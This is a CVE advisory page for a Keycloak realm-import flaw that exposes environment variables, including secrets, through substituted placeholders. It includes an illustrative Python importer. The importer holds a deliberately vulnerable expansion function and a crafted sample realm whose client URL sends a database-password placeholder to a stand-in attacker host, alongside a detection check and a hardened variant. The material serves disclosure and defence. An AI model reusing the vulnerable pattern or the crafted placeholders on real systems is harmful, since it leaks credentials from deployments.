CVE Alert

CVE-2025-9162

MEDIUM 4.9

org.keycloak/keycloak-model-storage-service: variable injection into environment variables

CVSS Score: 4.9
EPSS Score: 0.0%
EPSS Percentile: 0th

A flaw was found in org.keycloak/keycloak-model-storage-service. The KeycloakRealmImport custom resource substitutes placeholders in imported realm documents, and those placeholders can reference environment variables of the process performing the import. Because the substitution is applied to document content supplied by whoever submits the resource, a user who can create a crafted KeycloakRealmImport can inject placeholders that resolve to environment variables of the Keycloak environment, including variables that hold secrets, and have their values written into the imported realm. The CVSS vector (PR:H, C:H, I:N, A:N) reflects this: the attacker already needs high privileges (the ability to submit the custom resource), and the impact is disclosure of information from the Keycloak environment rather than modification of it or denial of service, which matches the assigned CWE-526 (exposure of sensitive information through environment variables).
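The substitution pattern described above, as an added illustration that is not Keycloak's own code: a minimal realm importer in Python that expands `${env.NAME}` placeholders in every string field of an untrusted document (the vulnerable shape), a pre-import check that lists which variables a document would read and where, and a hardened variant that only expands an explicit allowlist and rejects the document otherwise. The `${env.NAME}` syntax, the variable names, the sample realm document and the sample environment are all constructed for this example; the page does not state the exact placeholder syntax Keycloak accepts.

```python
import re
from typing import Any

# Placeholder syntax assumed for this illustration: ${env.NAME}. The page does not
# state the exact syntax Keycloak expands; the vulnerability class is the same.
ENV_PLACEHOLDER = re.compile(r"\$\{env\.([A-Za-z_][A-Za-z0-9_]*)\}")

# Constructed sample environment of an import pod (not real credentials).
IMPORT_POD_ENV = {
    "KC_DB_PASSWORD": "s3cret-db-pass",
    "KC_HOSTNAME": "sso.example.internal",
}

# Constructed sample realm document: the submitter plants a reference to a
# secret-bearing variable in fields that are later rendered back to them
# (a display name and a client URL).
CRAFTED_REALM = {
    "realm": "demo",
    "displayName": "Demo (${env.KC_DB_PASSWORD})",
    "clients": [
        {
            "clientId": "exfil",
            "rootUrl": "https://attacker.example/?v=${env.KC_DB_PASSWORD}",
        }
    ],
}


def _walk_strings(node: Any, path: str = "$"):
    """Yield (json_path, string) for every string leaf in a JSON-like document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def _map_strings(node: Any, fn):
    """Return a copy of the document with fn applied to every string leaf."""
    if isinstance(node, dict):
        return {key: _map_strings(value, fn) for key, value in node.items()}
    if isinstance(node, list):
        return [_map_strings(value, fn) for value in node]
    if isinstance(node, str):
        return fn(node)
    return node


def _expand(env: dict):
    """Substitute known ${env.NAME} references from env; leave unknown ones as-is."""
    return lambda s: ENV_PLACEHOLDER.sub(lambda m: env.get(m.group(1), m.group(0)), s)


def import_realm_vulnerable(doc: dict, env: dict) -> dict:
    """Vulnerable pattern: expand every ${env.NAME} in every field of an untrusted
    document from the importer's own environment. Whatever the import process can
    read, the document author can now read back through the imported realm."""
    return _map_strings(doc, _expand(env))


def find_env_references(doc: dict) -> dict:
    """Pre-import check: map each referenced variable name to the JSON paths that
    reference it, so a reviewer or admission hook sees what an import would read."""
    refs: dict = {}
    for path, text in _walk_strings(doc):
        for name in ENV_PLACEHOLDER.findall(text):
            refs.setdefault(name, []).append(path)
    return refs


def import_realm_hardened(doc: dict, env: dict, allowed: frozenset) -> dict:
    """Hardened pattern: only an explicit allowlist of non-secret variables may be
    expanded; any other reference rejects the whole document rather than being
    silently expanded or silently passed through."""
    disallowed = set(find_env_references(doc)) - allowed
    if disallowed:
        raise ValueError(
            f"realm import references disallowed environment variables: {sorted(disallowed)}"
        )
    return _map_strings(doc, _expand(env))


if __name__ == "__main__":
    leaked = import_realm_vulnerable(CRAFTED_REALM, IMPORT_POD_ENV)
    print("vulnerable rootUrl:", leaked["clients"][0]["rootUrl"])
    print("references:", find_env_references(CRAFTED_REALM))
    try:
        import_realm_hardened(CRAFTED_REALM, IMPORT_POD_ENV, frozenset({"KC_HOSTNAME"}))
    except ValueError as err:
        print("hardened:", err)
```

The pre-import check is the piece worth wiring into a review step: it turns "this document contains placeholders" into a concrete list of which variables would be read and from which fields, which is what an operator needs when deciding whether a KeycloakRealmImport submitted by a less-trusted tenant is safe to apply.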

CWE: CWE-526
Vendor: keycloak
Product: keycloak
Published: Aug 21, 2025
Last Updated: Dec 19, 2025

CVSS v3 Breakdown

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Affected Versions

Keycloak / keycloak: all versions prior to 26.3.4
Red Hat / Red Hat build of Keycloak 26.0: all versions affected
Red Hat / Red Hat build of Keycloak 26.2: all versions affected
Red Hat / Red Hat build of Keycloak 26.2.9: all versions affected

References

NVD / CVE.org / EPSS Data
access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15336
access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15337
access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15338
access.redhat.com: https://access.redhat.com/errata/RHSA-2025:15339
access.redhat.com: https://access.redhat.com/errata/RHSA-2025:16399
access.redhat.com: https://access.redhat.com/errata/RHSA-2025:16400
access.redhat.com: https://access.redhat.com/security/cve/CVE-2025-9162
bugzilla.redhat.com: https://bugzilla.redhat.com/show_bug.cgi?id=2389396